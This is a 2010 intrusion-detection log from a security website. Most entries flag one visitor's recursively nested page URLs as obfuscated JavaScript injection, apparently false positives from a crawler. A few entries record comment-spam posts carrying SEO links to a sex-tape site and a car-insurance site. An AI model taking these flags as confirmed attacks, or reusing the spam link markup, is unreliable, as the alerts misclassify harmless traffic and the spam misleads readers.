Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121488
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121489
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121490
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121491
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121492
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121493
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121494
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121495
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121496
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:06
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121469
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=forum/index/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=forum/index/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:05
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121470
Name:GET.page
Value:security/hackingillustrated/i.php?page=forum/index/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=forum/index/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:05
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121471
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=contact
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=contact
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:05
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121472
Name:GET.page
Value:security/hackingillustrated/i.php?page=contact
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=contact
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:05
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121473
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=workout/workout/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=workout/workout/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:05
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121474
Name:GET.page
Value:security/hackingillustrated/i.php?page=workout/workout/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=workout/workout/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:05
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121475
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/nutrition/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/nutrition/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:05
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121476
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/nutrition/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/nutrition/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:05
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121477
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:05
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121478
Name:GET.page
Value:security/hackingillustrated/i.php?page=fitness/supplements/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=fitness/supplements/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:05
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121479
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=humor/humor/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:05
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121480
Name:GET.page
Value:security/hackingillustrated/i.php?page=humor/humor/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=humor/humor/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:05
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121467
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=links
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=links
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:04
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121468
Name:GET.page
Value:security/hackingillustrated/i.php?page=links
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=links
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:25:04
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121465
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:56
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121466
Name:GET.page
Value:security/hackingillustrated/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:56
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121457
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:55
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121458
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:55
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121459
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:55
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121460
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:55
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121461
Name:GET.page
Value:security/hackingillustrated/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:55
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121462
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:55
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121463
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:55
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121464
Name:GET.page
Value:security/hackingillustrated/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:55
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121449
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:54
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121450
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:54
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121451
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:54
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121452
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/security-podcasts.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/security-podcasts.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:54
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121453
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:54
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121454
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/newscat.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/newscat.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:54
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121455
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:54
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121456
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:54
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121437
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:53
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121438
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:53
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121439
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:53
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121440
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:53
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121441
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:53
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121442
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:53
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121443
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:53
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121444
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:53
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121445
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:53
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121446
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:53
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121447
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:53
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121448
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/browserinfo.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/browserinfo.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:53
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121435
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:52
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121436
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:52
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121429
Name:REQUEST.page
Value:reviews/reviews/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:51
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121430
Name:GET.page
Value:reviews/reviews/i.php?page=hoosier
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=hoosier
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:51
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121431
Name:REQUEST.page
Value:reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:51
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121432
Name:GET.page
Value:reviews/reviews/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:51
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121433
Name:REQUEST.page
Value:reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:51
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121434
Name:GET.page
Value:reviews/reviews/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:51
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121423
Name:REQUEST.page
Value:reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:50
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121424
Name:GET.page
Value:reviews/reviews/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:50
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121425
Name:REQUEST.page
Value:reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:50
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121426
Name:GET.page
Value:reviews/reviews/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:50
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121427
Name:REQUEST.page
Value:reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:50
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121428
Name:GET.page
Value:reviews/reviews/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=reviews/reviews/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:50
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121414
Name:REQUEST.page
Value:security/security/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:49
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121415
Name:REQUEST.page
Value:security/security/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:49
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121416
Name:REQUEST.page
Value:security/security/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:49
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121417
Name:GET.page
Value:security/security/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:49
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121418
Name:GET.page
Value:security/security/i.php?page=security/security/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/security/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:49
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121419
Name:GET.page
Value:security/security/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:49
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121420
Name:GET.page
Value:security/security/i.php?page=security/hackingillustrated/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/hackingillustrated/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:49
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121421
Name:REQUEST.page
Value:security/security/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:49
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121422
Name:GET.page
Value:security/security/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:49
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121413
Name:REQUEST.page
Value:security/security/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/security/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 22:24:48
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121411
Name:REQUEST.codeme
Value:Nice, <a href= http://rkellysextape.posterous.com/#1 >r kelly sex tape</a> [url=http://rkellysextape.posterous.com/#1]r kelly sex tape[/url], hftdu,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-19 22:12:39
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121412
Name:POST.codeme
Value:Nice, <a href= http://rkellysextape.posterous.com/#1 >r kelly sex tape</a> [url=http://rkellysextape.posterous.com/#1]r kelly sex tape[/url], hftdu,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-19 22:12:39
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121409
Name:REQUEST.codeme
Value:Great site. Keep doing., <a href= http://carinsuranceforteenagers.yolasite.com#1 >car insurance for teenagers</a> [url=http://carinsuranceforteenagers.yolasite.com#1]car insurance for teenagers[/url], =-PP,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-19 21:49:40
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121410
Name:POST.codeme
Value:Great site. Keep doing., <a href= http://carinsuranceforteenagers.yolasite.com#1 >car insurance for teenagers</a> [url=http://carinsuranceforteenagers.yolasite.com#1]car insurance for teenagers[/url], =-PP,
Page:/xss-sql-injection-fuzzing-barcode-generator.php
IP:91.214.44.182
Impact:26
Created:2010-04-19 21:49:40
Details:
Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20
Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:121395
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 21:44:24
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121396
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=mobile-device-hacking
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=mobile-device-hacking
IP:68.82.60.248
Impact:10
Created:2010-04-19 21:44:24
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121397
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 21:44:24
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121398
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=security/code/
IP:68.82.60.248
Impact:10
Created:2010-04-19 21:44:24
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121399
Name:REQUEST.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 21:44:24
Details:
Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24

ID:121400
Name:GET.page
Value:security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/
Page:http://www.irongeek.com/i.php?page=security/hackingillustrated/i.php?page=security/security/i.php?page=reviews/reviews/
IP:68.82.60.248
Impact:10
Created:2010-04-19 21:44:24
